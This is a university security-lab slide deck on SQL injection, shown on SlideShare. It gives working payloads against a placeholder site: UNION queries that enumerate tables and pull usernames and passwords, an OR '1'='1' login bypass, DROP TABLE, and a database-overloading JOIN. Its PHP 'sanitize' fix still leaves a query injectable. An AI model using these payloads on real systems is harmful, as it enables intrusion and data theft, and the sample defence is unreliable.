SlideShare a Scribd company logo

A Brief Introduction in SQL Injection

Download as PPT, PDF
Sina Manavi
Sina Manavi
Education
1 of 22
Security Lab, University Putra Malaysia 23 May 2013 Sina Manavi Contact:http ://sinamanavi.blogspot.com/p/about-me.html
• Introduction • Why SQL Injection • What is needed for this • What you can do with SQL Injection • What are its pros and cons • Why we need to know and how we can prevent our database from SQL injection attacks
We are all familiar with SQL Language One of the technology that helped in converting the static web to dynamic one SQL is relatively easy to read, a little more difficult to write Works on Servers such as Apache, MS Server, etc. SQL Injection means manipulate SQL tables with unauthorized access
 SQL Injection may happen only two form of UI based or URL based ◦ (1) Injecting into a form. Such as username and password boxes on a login page. ◦ (2) Injecting into a URL. Like http://yourtarget.com/products/list.php? pid=10
 Simple example:  Select ID from tbl_users ◦ Where ID=“Uid” and pass=“pass” ◦ If it returns any value means that the current inputs are correct
 www.yourtarget.com/list?id=5  if you want to view a record from a table by the URL based injection: Select * from tbl_users Where id=5
 The "INFORMATION_SCHEMA" holds the names of every table and column on a site, its name will never change. ◦ Tables holding all the tables name:  "INFORMATION_SCHEMA.TABLES.“ ◦ Tables holding all the Column name:  "INFORMATION_SCHEMA.COLUMNS.“
 Finding the URL quantity: ◦ www.yourtarget.com/list.php? ID=10+ORDER+BY+1-- Increase the 1 , until you got error, then the last number is the column number  Finding Table name ◦ www.yourtarget.com/list.php? ID=-1+UNION+SELECT+1,2,3+FROM+INFORMATION_SCHEMA.TABLES-- And it shows: tbl_user To Be continued 
 Now its time to find out the Column names: www.yourtarget.com/list.php? ID = -1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+ WHERE+table_name=‘tbl_user'--  The result would be as following : id,username,password Column names finding step: www.yourtarget.com/list.php? ID = -1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS +WHERE+table_name='UserAccounts'+AND+column_name>'displayed_column'— Try the columns name until you find your target (e.g username,password, or login)
 And Finally its time to see the records: ◦ www.yourtarget.com/list.php? =- 1+UNION+SELECT+1,username,3+FROM+UserAccounts—  And ◦ www.yourtarget.com/list.php? =- 1+UNION+SELECT+1,password,3+FROM+UserAccounts— ◦ Username=admin password=123456 ◦ Stupid admin ha ;) 
 Now we can Alter the records as well, lets rock UPDATE tbl_user SET password = SHA2('$password') WHERE id = $id Or we can Insert a new user with Insert Command
If user_list contains 1000 records then, the database is fired up  SELECT * FROM user_list JOIN user_list JOIN user_list JOIN user_list JOIN user_list JOIN user_list
Insert newuser into tbl_user The maliciouse code can be : DROP table tbl_user
 How it works Select * from tbl_users Where id=“Fname” and pass=“pass”  Malicious Code: SELECT * FROM table WHERE id= ‘Fname' or '1'='1'; if(mysql_num_rows($result)) //do login Now the unauthorized user get accessed easily and bypassed the authorization
 Security is the developer’s job  No database, connector, or framework can prevent SQL injection all the time
• Implement proper Error Handling. This would include using a single error message for all errors. • Lock down User Database configuration, Specify users, roles and permissions etc. • prefix and append a quote to all user input, even if the data is numeric .
<?php function sanitize($string){ $string = strip_tags($string); $string = htmlspecialchars($string); $string = trim(rtrim(ltrim($string))); $string = mysql_real_escape_string($string); return $string; } $password = sanitize( $_POST["password"] ); mysql_query("UPDATE Users SET password = '$password' WHERE user_id = $user_id");
Vipin Samar, Oracle vice president of Database Security: “Database Firewall is a good first layer of defense for databases but it won't protect you from everything,”
 Using Stroprocedures: CREATE PROCEDURE SP_show_user(IN U_ID) BEGIN SELECT * FROM Bugs WHERE User_ID= U_ID; END CALL SP_show_user (54) “Might be helpful but still vulnerable”
 I don’t have to worry anymore  Escaping is the fixthe fix  More escaping is better  I can code an escaping function  Only user input is unsafe  Stored procs are the fixthe fix  SQL privileges are the fixthe fix  My app doesn’t need security  Frameworks are the fixthe fix  Parameters quote for you  Parameters are the fixthe fix  Parameters make queries slow  SQL proxies are the fixthe fix  NoSQL databases are the fixthe fix
NoSQL databases are immune to SQL injection.

Recommended

SQL Injections (Part 1)
SQL Injections (Part 1)SQL Injections (Part 1)
SQL Injections (Part 1)n|u - The Open Security Community
 
Sql injection
Sql injectionSql injection
Sql injectionZidh
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attackRajKumar Rampelli
 
How to identify and prevent SQL injection
How to identify and prevent SQL injection How to identify and prevent SQL injection
How to identify and prevent SQL injection Eguardian Global Services
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testingNapendra Singh
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and preventionhelloanand
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 

Recommended

SQL Injections (Part 1)
SQL Injections (Part 1)SQL Injections (Part 1)
SQL Injections (Part 1)n|u - The Open Security Community
 
Sql injection
Sql injectionSql injection
Sql injectionZidh
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attackRajKumar Rampelli
 
How to identify and prevent SQL injection
How to identify and prevent SQL injection How to identify and prevent SQL injection
How to identify and prevent SQL injection Eguardian Global Services
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injectionashish20012
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testingNapendra Singh
 
Sql Injection attacks and prevention
Sql Injection attacks and preventionSql Injection attacks and prevention
Sql Injection attacks and preventionhelloanand
 
Sql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySql Injection - Vulnerability and Security
Sql Injection - Vulnerability and SecuritySandip Chaudhari
 
Sql injections - with example
Sql injections - with exampleSql injections - with example
Sql injections - with examplePrateek Chauhan
 
Sql injection
Sql injectionSql injection
Sql injectionNikunj Dhameliya
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONMentorcs
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationRapid Purple
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniquesSongchaiDuangpan
 
Sql injection
Sql injectionSql injection
Sql injectionHemendra Kumar
 
SQL Injection attack
SQL Injection attackSQL Injection attack
SQL Injection attackRayudu Babu
 
SQL Injection
SQL InjectionSQL Injection
SQL InjectionAsish Kumar Rath
 
SQL injection
SQL injectionSQL injection
SQL injectionRaj Parmar
 
Sql injection
Sql injectionSql injection
Sql injectionPallavi Biswas
 
SQL Injection
SQL Injection SQL Injection
SQL Injection Adhoura Academy
 
Sql injection with sqlmap
Sql injection with sqlmapSql injection with sqlmap
Sql injection with sqlmapHerman Duarte
 
Sql injection in cybersecurity
Sql injection in cybersecuritySql injection in cybersecurity
Sql injection in cybersecuritySanad Bhowmik
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoPichaya Morimoto
 
Sql injection
Sql injectionSql injection
Sql injectionNitish Kumar
 
Sql injection
Sql injectionSql injection
Sql injectionSasha-Leigh Garret
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attackRaghav Bisht
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
Sql injection
Sql injectionSql injection
Sql injectionManjushree Mashal
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionVishal Kumar
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONAnoop T
 
Cehv8 Labs - Module14: SQL Injection
Cehv8 Labs - Module14: SQL InjectionCehv8 Labs - Module14: SQL Injection
Cehv8 Labs - Module14: SQL InjectionVuz Dở Hơi
 

More Related Content

What's hot

Sql injections - with example
Sql injections - with exampleSql injections - with example
Sql injections - with examplePrateek Chauhan
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONMentorcs
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationRapid Purple
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniquesSongchaiDuangpan
 
SQL Injection attack
SQL Injection attackSQL Injection attack
SQL Injection attackRayudu Babu
 
Sql injection with sqlmap
Sql injection with sqlmapSql injection with sqlmap
Sql injection with sqlmapHerman Duarte
 
Sql injection in cybersecurity
Sql injection in cybersecuritySql injection in cybersecurity
Sql injection in cybersecuritySanad Bhowmik
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoPichaya Morimoto
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attackRaghav Bisht
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionVishal Kumar
 

What's hot (20)

Sql injections - with example
Sql injections - with exampleSql injections - with example
Sql injections - with example
 
Sql injection
Sql injectionSql injection
Sql injection
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint Presentation
 
SQL injection prevention techniques
SQL injection prevention techniquesSQL injection prevention techniques
SQL injection prevention techniques
 
Sql injection
Sql injectionSql injection
Sql injection
 
SQL Injection attack
SQL Injection attackSQL Injection attack
SQL Injection attack
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
SQL injection
SQL injectionSQL injection
SQL injection
 
Sql injection
Sql injectionSql injection
Sql injection
 
SQL Injection
SQL Injection SQL Injection
SQL Injection
 
Sql injection with sqlmap
Sql injection with sqlmapSql injection with sqlmap
Sql injection with sqlmap
 
Sql injection in cybersecurity
Sql injection in cybersecuritySql injection in cybersecurity
Sql injection in cybersecurity
 
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya MorimotoSQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto
 
Sql injection
Sql injectionSql injection
Sql injection
 
Sql injection
Sql injectionSql injection
Sql injection
 
Sql injection attack
Sql injection attackSql injection attack
Sql injection attack
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
 
Sql injection
Sql injectionSql injection
Sql injection
 
Deep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL InjectionDeep understanding on Cross-Site Scripting and SQL Injection
Deep understanding on Cross-Site Scripting and SQL Injection
 

Viewers also liked

SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTIONAnoop T
 
Cehv8 Labs - Module14: SQL Injection
Cehv8 Labs - Module14: SQL InjectionCehv8 Labs - Module14: SQL Injection
Cehv8 Labs - Module14: SQL InjectionVuz Dở Hơi
 
Sql Injection and Entity Frameworks
Sql Injection and Entity FrameworksSql Injection and Entity Frameworks
Sql Injection and Entity FrameworksRich Helton
 
Unethical access to website’s databases hacking using sql injection
Unethical access to website’s databases hacking using sql injectionUnethical access to website’s databases hacking using sql injection
Unethical access to website’s databases hacking using sql injectionSatyajit Mukherjee
 
Hacker Halted 2014 - Why Botnet Takedowns Never Work, Unless It’s a SmackDown!
Hacker Halted 2014 - Why Botnet Takedowns Never Work, Unless It’s a SmackDown!Hacker Halted 2014 - Why Botnet Takedowns Never Work, Unless It’s a SmackDown!
Hacker Halted 2014 - Why Botnet Takedowns Never Work, Unless It’s a SmackDown!EC-Council
 
Java Course 13: JDBC & Logging
Java Course 13: JDBC & LoggingJava Course 13: JDBC & Logging
Java Course 13: JDBC & LoggingAnton Keks
 
Hacking With Sql Injection Exposed - A Research Thesis
Hacking With Sql Injection Exposed - A Research ThesisHacking With Sql Injection Exposed - A Research Thesis
Hacking With Sql Injection Exposed - A Research Thesiscorbanmiferreira
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacksRespa Peter
 
HTTPS: What, Why and How (SmashingConf Freiburg, Sep 2015)
HTTPS: What, Why and How (SmashingConf Freiburg, Sep 2015)HTTPS: What, Why and How (SmashingConf Freiburg, Sep 2015)
HTTPS: What, Why and How (SmashingConf Freiburg, Sep 2015)Guy Podjarny
 
BrightonSEO Sep 2015 - HTTPS | Mark Thomas
BrightonSEO Sep 2015 - HTTPS | Mark Thomas BrightonSEO Sep 2015 - HTTPS | Mark Thomas
BrightonSEO Sep 2015 - HTTPS | Mark Thomas Anna Morrison
 
9 dạng bài tập định khoản kế toán
9 dạng bài tập định khoản kế toán9 dạng bài tập định khoản kế toán
9 dạng bài tập định khoản kế toánLớp kế toán trưởng
 
Introduction to SEO Presentation
Introduction to SEO PresentationIntroduction to SEO Presentation
Introduction to SEO Presentation7thingsmedia
 
ethical hacking in the modern times
ethical hacking in the modern timesethical hacking in the modern times
ethical hacking in the modern timesjeshin jose
 

Viewers also liked (19)

SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
Cehv8 Labs - Module14: SQL Injection
Cehv8 Labs - Module14: SQL InjectionCehv8 Labs - Module14: SQL Injection
Cehv8 Labs - Module14: SQL Injection
 
Sql Injection and Entity Frameworks
Sql Injection and Entity FrameworksSql Injection and Entity Frameworks
Sql Injection and Entity Frameworks
 
Unethical access to website’s databases hacking using sql injection
Unethical access to website’s databases hacking using sql injectionUnethical access to website’s databases hacking using sql injection
Unethical access to website’s databases hacking using sql injection
 
Hacker Halted 2014 - Why Botnet Takedowns Never Work, Unless It’s a SmackDown!
Hacker Halted 2014 - Why Botnet Takedowns Never Work, Unless It’s a SmackDown!Hacker Halted 2014 - Why Botnet Takedowns Never Work, Unless It’s a SmackDown!
Hacker Halted 2014 - Why Botnet Takedowns Never Work, Unless It’s a SmackDown!
 
HTTPS, Here and Now
HTTPS, Here and NowHTTPS, Here and Now
HTTPS, Here and Now
 
Java Course 13: JDBC & Logging
Java Course 13: JDBC & LoggingJava Course 13: JDBC & Logging
Java Course 13: JDBC & Logging
 
Hacking With Sql Injection Exposed - A Research Thesis
Hacking With Sql Injection Exposed - A Research ThesisHacking With Sql Injection Exposed - A Research Thesis
Hacking With Sql Injection Exposed - A Research Thesis
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacks
 
HTTPS: What, Why and How (SmashingConf Freiburg, Sep 2015)
HTTPS: What, Why and How (SmashingConf Freiburg, Sep 2015)HTTPS: What, Why and How (SmashingConf Freiburg, Sep 2015)
HTTPS: What, Why and How (SmashingConf Freiburg, Sep 2015)
 
Jdbc ppt
Jdbc pptJdbc ppt
Jdbc ppt
 
Mime
MimeMime
Mime
 
BrightonSEO Sep 2015 - HTTPS | Mark Thomas
BrightonSEO Sep 2015 - HTTPS | Mark Thomas BrightonSEO Sep 2015 - HTTPS | Mark Thomas
BrightonSEO Sep 2015 - HTTPS | Mark Thomas
 
Bài tập kế toán tài chính doanh nghiệp có đáp án
Bài tập kế toán tài chính doanh nghiệp có đáp ánBài tập kế toán tài chính doanh nghiệp có đáp án
Bài tập kế toán tài chính doanh nghiệp có đáp án
 
9 dạng bài tập định khoản kế toán
9 dạng bài tập định khoản kế toán9 dạng bài tập định khoản kế toán
9 dạng bài tập định khoản kế toán
 
Introduction to SEO Presentation
Introduction to SEO PresentationIntroduction to SEO Presentation
Introduction to SEO Presentation
 
ethical hacking in the modern times
ethical hacking in the modern timesethical hacking in the modern times
ethical hacking in the modern times
 
Jdbc Ppt
Jdbc PptJdbc Ppt
Jdbc Ppt
 

Similar to A Brief Introduction in SQL Injection

Code injection and green sql
Code injection and green sqlCode injection and green sql
Code injection and green sqlKaustav Sengupta
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009mirahman
 
Php Security - OWASP
Php Security - OWASPPhp Security - OWASP
Php Security - OWASPMizno Kruge
 
SQL Injection in PHP
SQL Injection in PHPSQL Injection in PHP
SQL Injection in PHPDave Ross
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacksKevin Kline
 
SQLSecurity.ppt
SQLSecurity.pptSQLSecurity.ppt
SQLSecurity.pptCNSHacking
 
SQLSecurity.ppt
SQLSecurity.pptSQLSecurity.ppt
SQLSecurity.pptLokeshK66
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENGDmitry Evteev
 
Chapter 14 sql injection
Chapter 14 sql injectionChapter 14 sql injection
Chapter 14 sql injectionnewbie2019
 
Locking Down Your MySQL Database.pptx
Locking Down Your MySQL Database.pptxLocking Down Your MySQL Database.pptx
Locking Down Your MySQL Database.pptxDave Stokes
 
DEFCON 23 - Lance buttars Nemus - sql injection on lamp
DEFCON 23 - Lance buttars Nemus - sql injection on lampDEFCON 23 - Lance buttars Nemus - sql injection on lamp
DEFCON 23 - Lance buttars Nemus - sql injection on lampFelipe Prado
 
Practical Approach towards SQLi ppt
Practical Approach towards SQLi pptPractical Approach towards SQLi ppt
Practical Approach towards SQLi pptAhamed Saleem
 

Similar to A Brief Introduction in SQL Injection (20)

SQL Injection Attacks
SQL Injection AttacksSQL Injection Attacks
SQL Injection Attacks
 
Greensql2007
Greensql2007Greensql2007
Greensql2007
 
Code injection and green sql
Code injection and green sqlCode injection and green sql
Code injection and green sql
 
Sql injection
Sql injectionSql injection
Sql injection
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
 
Php Security - OWASP
Php Security - OWASPPhp Security - OWASP
Php Security - OWASP
 
SQL Injection in PHP
SQL Injection in PHPSQL Injection in PHP
SQL Injection in PHP
 
Understanding and preventing sql injection attacks
Understanding and preventing sql injection attacksUnderstanding and preventing sql injection attacks
Understanding and preventing sql injection attacks
 
SQLSecurity.ppt
SQLSecurity.pptSQLSecurity.ppt
SQLSecurity.ppt
 
SQLSecurity.ppt
SQLSecurity.pptSQLSecurity.ppt
SQLSecurity.ppt
 
Web Security 101
Web Security 101Web Security 101
Web Security 101
 
Advanced Sql Injection ENG
Advanced Sql Injection ENGAdvanced Sql Injection ENG
Advanced Sql Injection ENG
 
Sql security
Sql securitySql security
Sql security
 
Chapter 14 sql injection
Chapter 14 sql injectionChapter 14 sql injection
Chapter 14 sql injection
 
Locking Down Your MySQL Database.pptx
Locking Down Your MySQL Database.pptxLocking Down Your MySQL Database.pptx
Locking Down Your MySQL Database.pptx
 
DEFCON 23 - Lance buttars Nemus - sql injection on lamp
DEFCON 23 - Lance buttars Nemus - sql injection on lampDEFCON 23 - Lance buttars Nemus - sql injection on lamp
DEFCON 23 - Lance buttars Nemus - sql injection on lamp
 
Sq li
Sq liSq li
Sq li
 
Web application security
Web application securityWeb application security
Web application security
 
Code injection
Code injectionCode injection
Code injection
 
Practical Approach towards SQLi ppt
Practical Approach towards SQLi pptPractical Approach towards SQLi ppt
Practical Approach towards SQLi ppt
 

More from Sina Manavi

Android Application Security Awareness Talk, OWASP MEETUP Q3, 2015
Android Application Security Awareness Talk, OWASP MEETUP Q3, 2015Android Application Security Awareness Talk, OWASP MEETUP Q3, 2015
Android Application Security Awareness Talk, OWASP MEETUP Q3, 2015Sina Manavi
 
EC-Council Hackway Workshop Presentation- Social Media Forensics
EC-Council Hackway Workshop Presentation- Social Media ForensicsEC-Council Hackway Workshop Presentation- Social Media Forensics
EC-Council Hackway Workshop Presentation- Social Media ForensicsSina Manavi
 
Password Attack
Password Attack Password Attack
Password Attack Sina Manavi
 
Android Hacking + Pentesting
Android Hacking + Pentesting Android Hacking + Pentesting
Android Hacking + Pentesting Sina Manavi
 
Password Cracking
Password Cracking Password Cracking
Password Cracking Sina Manavi
 
An Introduction on Design and Implementation on BYOD and Mobile Security
An Introduction on Design and Implementation on BYOD and Mobile SecurityAn Introduction on Design and Implementation on BYOD and Mobile Security
An Introduction on Design and Implementation on BYOD and Mobile SecuritySina Manavi
 
Aes (advance encryption standard)
Aes (advance encryption standard) Aes (advance encryption standard)
Aes (advance encryption standard) Sina Manavi
 
Shannon and 5 good criteria of a good cipher
Shannon and 5 good criteria of a good cipher Shannon and 5 good criteria of a good cipher
Shannon and 5 good criteria of a good cipher Sina Manavi
 
Honeypot honeynet
Honeypot honeynetHoneypot honeynet
Honeypot honeynetSina Manavi
 
Mendeley resentation , Sina Manavi
Mendeley resentation , Sina Manavi Mendeley resentation , Sina Manavi
Mendeley resentation , Sina Manavi Sina Manavi
 

More from Sina Manavi (10)

Android Application Security Awareness Talk, OWASP MEETUP Q3, 2015
Android Application Security Awareness Talk, OWASP MEETUP Q3, 2015Android Application Security Awareness Talk, OWASP MEETUP Q3, 2015
Android Application Security Awareness Talk, OWASP MEETUP Q3, 2015
 
EC-Council Hackway Workshop Presentation- Social Media Forensics
EC-Council Hackway Workshop Presentation- Social Media ForensicsEC-Council Hackway Workshop Presentation- Social Media Forensics
EC-Council Hackway Workshop Presentation- Social Media Forensics
 
Password Attack
Password Attack Password Attack
Password Attack
 
Android Hacking + Pentesting
Android Hacking + Pentesting Android Hacking + Pentesting
Android Hacking + Pentesting
 
Password Cracking
Password Cracking Password Cracking
Password Cracking
 
An Introduction on Design and Implementation on BYOD and Mobile Security
An Introduction on Design and Implementation on BYOD and Mobile SecurityAn Introduction on Design and Implementation on BYOD and Mobile Security
An Introduction on Design and Implementation on BYOD and Mobile Security
 
Aes (advance encryption standard)
Aes (advance encryption standard) Aes (advance encryption standard)
Aes (advance encryption standard)
 
Shannon and 5 good criteria of a good cipher
Shannon and 5 good criteria of a good cipher Shannon and 5 good criteria of a good cipher
Shannon and 5 good criteria of a good cipher
 
Honeypot honeynet
Honeypot honeynetHoneypot honeynet
Honeypot honeynet
 
Mendeley resentation , Sina Manavi
Mendeley resentation , Sina Manavi Mendeley resentation , Sina Manavi
Mendeley resentation , Sina Manavi
 

Recently uploaded

Advanced Views - Calendar View in Odoo 17
Advanced Views - Calendar View in Odoo 17Advanced Views - Calendar View in Odoo 17
Advanced Views - Calendar View in Odoo 17Celine George
 
Beyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactBeyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactPECB
 
JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...
JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...
JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...anjaliyadav012327
 
CARE OF CHILD IN INCUBATOR..........pptx
CARE OF CHILD IN INCUBATOR..........pptxCARE OF CHILD IN INCUBATOR..........pptx
CARE OF CHILD IN INCUBATOR..........pptxGaneshChakor2
 
Activity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfActivity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfciinovamais
 
Interactive Powerpoint_How to Master effective communication
Interactive Powerpoint_How to Master effective communicationInteractive Powerpoint_How to Master effective communication
Interactive Powerpoint_How to Master effective communicationnomboosow
 
Disha NEET Physics Guide for classes 11 and 12.pdf
Disha NEET Physics Guide for classes 11 and 12.pdfDisha NEET Physics Guide for classes 11 and 12.pdf
Disha NEET Physics Guide for classes 11 and 12.pdfchloefrazer622
 
The byproduct of sericulture in different industries.pptx
The byproduct of sericulture in different industries.pptxThe byproduct of sericulture in different industries.pptx
The byproduct of sericulture in different industries.pptxShobhayan Kirtania
 
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Krashi Coaching
 
Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104misteraugie
 
The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13The Most Excellent Way | 1 Corinthians 13
The Most Excellent Way | 1 Corinthians 13Steve Thomason
 
Measures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and ModeMeasures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and ModeThiyagu K
 
Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111Sapana Sha
 
Web & Social Media Analytics Previous Year Question Paper.pdf
Web & Social Media Analytics Previous Year Question Paper.pdfWeb & Social Media Analytics Previous Year Question Paper.pdf
Web & Social Media Analytics Previous Year Question Paper.pdfJayanti Pande
 
Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)Software Engineering Methodologies (overview)
Software Engineering Methodologies (overview)eniolaolutunde
 
Mastering the Unannounced Regulatory Inspection
Mastering the Unannounced Regulatory InspectionMastering the Unannounced Regulatory Inspection
Mastering the Unannounced Regulatory InspectionSafetyChain Software
 
Arihant handbook biology for class 11 .pdf
Arihant handbook biology for class 11 .pdfArihant handbook biology for class 11 .pdf
Arihant handbook biology for class 11 .pdfchloefrazer622
 
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...
BAG TECHNIQUE Bag technique-a tool making use of public health bag through wh...Sapna Thakur
 

Recently uploaded (20)

Advanced Views - Calendar View in Odoo 17
Advanced Views - Calendar View in Odoo 17Advanced Views - Calendar View in Odoo 17
Advanced Views - Calendar View in Odoo 17
 
Beyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global ImpactBeyond the EU: DORA and NIS 2 Directive's Global Impact
Beyond the EU: DORA and NIS 2 Directive's Global Impact
 
Código Creativo y Arte de Software | Unidad 1
Código Creativo y Arte de Software | Unidad 1Código Creativo y Arte de Software | Unidad 1
Código Creativo y Arte de Software | Unidad 1
 
JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...
JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...
JAPAN: ORGANISATION OF PMDA, PHARMACEUTICAL LAWS & REGULATIONS, TYPES OF REGI...
 
CARE OF CHILD IN INCUBATOR..........pptx
CARE OF CHILD IN INCUBATOR..........pptxCARE OF CHILD IN INCUBATOR..........pptx
CARE OF CHILD IN INCUBATOR..........pptx
 
Activity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfActivity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdf
 
Mattingly "AI & Prompt Design: The Basics of Prompt Design"
Mattingly "AI & Prompt Design: The Basics of Prompt Design"Mattingly "AI & Prompt Design: The Basics of Prompt Design"
Mattingly "AI & Prompt Design: The Basics of Prompt Design"
 
Interactive Powerpoint_How to Master effective communication
Interactive Powerpoint_How to Master effective communicationInteractive Powerpoint_How to Master effective communication
Interactive Powerpoint_How to Master effective communication
 
Disha NEET Physics Guide for classes 11 and 12.pdf
Disha NEET Physics Guide for classes 11 and 12.pdfDisha NEET Physics Guide for classes 11 and 12.pdf
Disha NEET Physics Guide for classes 11 and 12.pdf
 
The byproduct of sericulture in different industries.pptx
The byproduct of sericulture in different industries.pptxThe byproduct of sericulture in different industries.pptx
The byproduct of sericulture in different industries.pptx
 
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
 
Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104
 
The Most Excellent Way | 1 Corinthians 13
